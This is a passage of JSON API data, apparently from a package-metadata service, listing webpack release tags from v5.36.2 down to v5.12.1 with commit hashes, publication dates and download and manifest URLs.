tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T